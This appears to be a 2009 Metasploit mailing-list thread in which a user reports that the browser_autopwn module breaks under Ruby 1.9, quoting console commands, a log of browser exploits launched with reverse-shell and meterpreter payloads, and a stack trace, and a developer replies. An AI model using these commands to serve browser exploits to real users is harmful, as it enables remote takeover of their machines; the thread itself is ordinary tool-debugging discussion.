Metasploit mailing list archives
browser_autopwn broken
From: egypt at metasploit.com (egypt at metasploit.com)
Date: Sun, 9 Aug 2009 10:38:20 -0600
This looks like a 1.9 compatibility issue. I haven't done any testing on 1.9 yet, but I'll try to take a look at it today. Thanks, egypt On Sun, Aug 9, 2009 at 5:32 AM, Donna Hawthorne<donnahawthorneonline at googlemail.com> wrote:
Running latest from subversion(changeset 6944), cygwin bundled(Ruby 1.9.1) Windows XP SP3 ============== msf > use auxiliary/server/browser_autopwn msf auxiliary(browser_autopwn) > exploit [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: LHOST. msf auxiliary(browser_autopwn) > set lhost 192.168.2.122 lhost => 192.168.2.122 msf auxiliary(browser_autopwn) > exploit [*] Auxiliary module running as background job msf auxiliary(browser_autopwn) > [*] Starting exploit modules on host 192.168.2.122... [*] --- [*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/W5ILKcfokRVq [*] ?Local IP: http://192.168.2.121:8080/W5ILKcfokRVq [*] Server started. [*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/p0MrY4DboYl1CO [*] ?Local IP: http://192.168.2.121:8080/p0MrY4DboYl1CO [*] Server started. [*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/piP9Qeqhd [*] ?Local IP: http://192.168.2.121:8080/piP9Qeqhd [*] Server started. [*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp [-] Exploit failed: invalid value for Integer: " " [-] Failed to start exploit module multi/browser/opera_configoverwrite [*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp [-] Exploit failed: invalid value for Integer: " " [-] Failed to start exploit module multi/browser/opera_historysearch [*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/mam7caoLJN [*] ?Local IP: http://192.168.2.121:8080/mam7caoLJN [*] Server started. [*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp [-] Exploit failed: invalid value for Integer: ">" [-] Failed to start exploit module windows/browser/apple_quicktime_rtsp [*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/MoL3SfX [*] ?Local IP: http://192.168.2.121:8080/MoL3SfX [*] Server started. [*] Starting exploit windows/browser/ie_xml_corruption with payload windows/meterpreter/reverse_tcp [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/rltd9vvx5O7czZ2 [*] ?Local IP: http://192.168.2.121:8080/rltd9vvx5O7czZ2 [*] Server started. [*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp [-] Exploit failed: invalid value for Integer: "\xE2" [-] Failed to start exploit module windows/browser/ms03_020_ie_objecttype [*] Starting exploit windows/browser/ms06_067_keyframe with payload windows/meterpreter/reverse_tcp [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/aIoMr4cd8MUmD [*] ?Local IP: http://192.168.2.121:8080/aIoMr4cd8MUmD [*] Server started. [*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/yqpauRa5D [*] ?Local IP: http://192.168.2.121:8080/yqpauRa5D [*] Server started. [*] --- Done, found 8 exploit modules [*] Using URL: http://0.0.0.0:8080/MV1f7ANTV9OI [*] ?Local IP: http://192.168.2.121:8080/MV1f7ANTV9OI [*] Server started. [*] Using URL: http://0.0.0.0:8080/MV1f7ANTV9OI [*] ?Local IP: http://192.168.2.121:8080/MV1f7ANTV9OI [*] Server started. [*] Request '/MV1f7ANTV9OI' from 192.168.2.121:1925 [*] Request '/MV1f7ANTV9OI?sessid=dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZWQ6ZW4tVVM6eDg2OlNhZmFyaTp1bmRlZmluZWQ6' from 192.168.2.121:1925 [*] JavaScript Report: undefined:undefined:undefined:en-US:x86:Safari:undefined: [*] No database, using targetcache instead [*] Responding with exploits Error: No such file or directory - /home/user/OcJS3zcw.zip (eval):116:in `initialize' (eval):116:in `new' (eval):116:in `generate_zip' (eval):83:in `on_request_uri' /msf3/lib/msf/core/exploit/http.rb:343:in `block in start_service' /msf3/lib/rex/proto/http/handler/proc.rb:37:in `call' /msf3/lib/rex/proto/http/handler/proc.rb:37:in `on_request' /msf3/lib/rex/proto/http/server.rb:340:in `dispatch_request' /msf3/lib/rex/proto/http/server.rb:279:in `on_client_data' /msf3/lib/rex/proto/http/server.rb:142:in `block in start' /msf3/lib/rex/io/stream_server.rb:45:in `call' /msf3/lib/rex/io/stream_server.rb:45:in `on_client_data' /msf3/lib/rex/io/stream_server.rb:183:in `block in monitor_clients' /msf3/lib/rex/io/stream_server.rb:181:in `each' /msf3/lib/rex/io/stream_server.rb:181:in `monitor_clients' /msf3/lib/rex/io/stream_server.rb:68:in `block in start' ================================== As you can see, a couple exploits fail to start _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- browser_autopwn broken Donna Hawthorne (Aug 09)
- browser_autopwn broken egypt at metasploit.com (Aug 09)
- browser_autopwn broken egypt at metasploit.com (Sep 27)
- browser_autopwn broken Donna Hawthorne (Sep 28)
- browser_autopwn broken egypt at metasploit.com (Sep 30)
- browser_autopwn broken egypt at metasploit.com (Sep 27)
- browser_autopwn broken egypt at metasploit.com (Aug 09)